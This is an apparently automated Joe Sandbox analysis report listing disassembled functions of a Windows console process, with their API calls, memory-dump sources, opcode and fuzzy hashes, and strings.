                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$iswdigit$wcstol
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3841054028-0
                                                                                                                    • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                    • Instruction ID: efcfdabf847235ef2820f268d11a75a1feda3d49804b6f83ea031a395540308f
                                                                                                                    • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                    • Instruction Fuzzy Hash: 5F51F726E04A5A92E724AF1594101BDBEB5FF68F92BE4C235DE5D422D4EF3CE441C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC5984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE3687
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF789BC260D), ref: 00007FF789BE36A6
                                                                                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF789BC260D), ref: 00007FF789BE36EB
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BE3703
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF789BC260D), ref: 00007FF789BE3722
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1066134489-0
                                                                                                                    • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                    • Instruction ID: e6b314230b70dab50962866acacd50fd54758ca4f4de1fe54c0473a6cc575aa9
                                                                                                                    • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                    • Instruction Fuzzy Hash: 53519E21B0864A9BEA246F21D40457EEFB5FB54F96FA84535DE0A07790EF7CE441CA20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC89C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 850181435-0
                                                                                                                    • Opcode ID: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                                    • Instruction ID: 74c16cc54365d7afed68b7ae36681aa3d1bd35794cf881e2727f9001d35e8cd2
                                                                                                                    • Opcode Fuzzy Hash: 41e637cf901b3345656d12757c0875431f92b4df5430d67bb2a32cad95087ec1
                                                                                                                    • Instruction Fuzzy Hash: E3419F32608BC9C9E7609F20D8442E9BBB0FB89F8AFA54425EA4D4BB58DF3CD545C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD34A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD3514
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD3522
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD3541
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD355E
                                                                                                                      • Part of subcall function 00007FF789BD36EC: _get_osfhandle.MSVCRT ref: 00007FF789BD3715
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF789BD3770
                                                                                                                      • Part of subcall function 00007FF789BD36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD3791
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4057327938-0
                                                                                                                    • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                    • Instruction ID: 401c88bb2e8d679485544777b3b61c1f8c58f562366e7632a0ad40c46e1f55da
                                                                                                                    • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                    • Instruction Fuzzy Hash: E1313021A0CA4A86F7507F25A40507DFEB0FF89F86FE44139D90E42796DE2DE504C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEBE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                    • String ID: KEYS$LIST$OFF
                                                                                                                    • API String ID: 411561164-4129271751
                                                                                                                    • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                    • Instruction ID: 23122a5cb2d335a7735743499607e02b8607d39f7e468d79c9e067c2f33d8768
                                                                                                                    • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                                                                                                    • Instruction Fuzzy Hash: 96217120A0861BC1FA54BF66E454179EA75FF84F92FE09631DA1E472E5EE3CD444C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD01B8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD01C4
                                                                                                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD01D6
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD0212
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD0228
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD023C
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF789BDE904,?,?,?,?,00000000,00007FF789BD3491,?,?,?,00007FF789BE4420), ref: 00007FF789BD0251
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 513048808-0
                                                                                                                    • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                    • Instruction ID: c025d23c53e007ed256a811c72444eda24190885ed1f94388be429216d833e85
                                                                                                                    • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                                                                                                                    • Instruction Fuzzy Hash: 04213E2190D68A87EA506F65E588238FEB0FF4AF57FB45134DA1F02694DE7DD444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD9584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4104442557-0
                                                                                                                    • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                    • Instruction ID: 50cfb6c9e41135a0df8cdc5ef6ba955a26b010c615876f438cb6c6979131e036
                                                                                                                    • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                    • Instruction Fuzzy Hash: 1E116622605F498AEB00EF75E84416877B4F749B59F901A30EA6D47B54EF3CD1A4C350
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD3578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                    • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 513048808-0
                                                                                                                    • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                    • Instruction ID: bb030f769259e8873057b5270d15da7be3544c17267ef04040301f1275ed4b43
                                                                                                                    • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                    • Instruction Fuzzy Hash: 90115121A0CA4A86EA146F25E558078FEB0FF49FAAFA45334D92E023D1DE3CD444C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE71F9
                                                                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE720D
                                                                                                                    • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE7300
                                                                                                                      • Part of subcall function 00007FF789BE5740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF789BE75C4,?,?,00000000,00007FF789BE6999,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE5744
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                                                    • String ID: _p0$wil
                                                                                                                    • API String ID: 455305043-1814513734
                                                                                                                    • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                    • Instruction ID: 262f36f4289be4c08934e305f260b7cd93afcdb3e612c9e6268f7b2b30144b51
                                                                                                                    • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                                    • Instruction Fuzzy Hash: 2061D261B1974A89EE25AF6594501BDABB9FF84F82FE44531DA0E07744EF3CE501C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC1DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                                    • String ID: %s
                                                                                                                    • API String ID: 2401724867-3043279178
                                                                                                                    • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                    • Instruction ID: 95e9caf6f8eafff55496f850db8a7b275297a31a8bfdbd8917217398355056ba
                                                                                                                    • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                                                    • Instruction Fuzzy Hash: 2551C232B0868A85EB60AF21D8502B9BBB4FB48F96FA44035DA5D47794EF3CE441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCE260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit
                                                                                                                    • String ID: GeToken: (%x) '%s'
                                                                                                                    • API String ID: 3849470556-1994581435
                                                                                                                    • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                    • Instruction ID: 4ccf32908bc8f0a3a7b37b05489718d9b68e1c6949ec681cbd4bfbd0e642b850
                                                                                                                    • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                                                    • Instruction Fuzzy Hash: D1517C31A0864AC5EB64AF65E444279BBB0FF84F6AFA48435DA4D47390DF7DE841C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE9A10
                                                                                                                    • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BE9994
                                                                                                                      • Part of subcall function 00007FF789BEA73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA77A
                                                                                                                      • Part of subcall function 00007FF789BEA73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA839
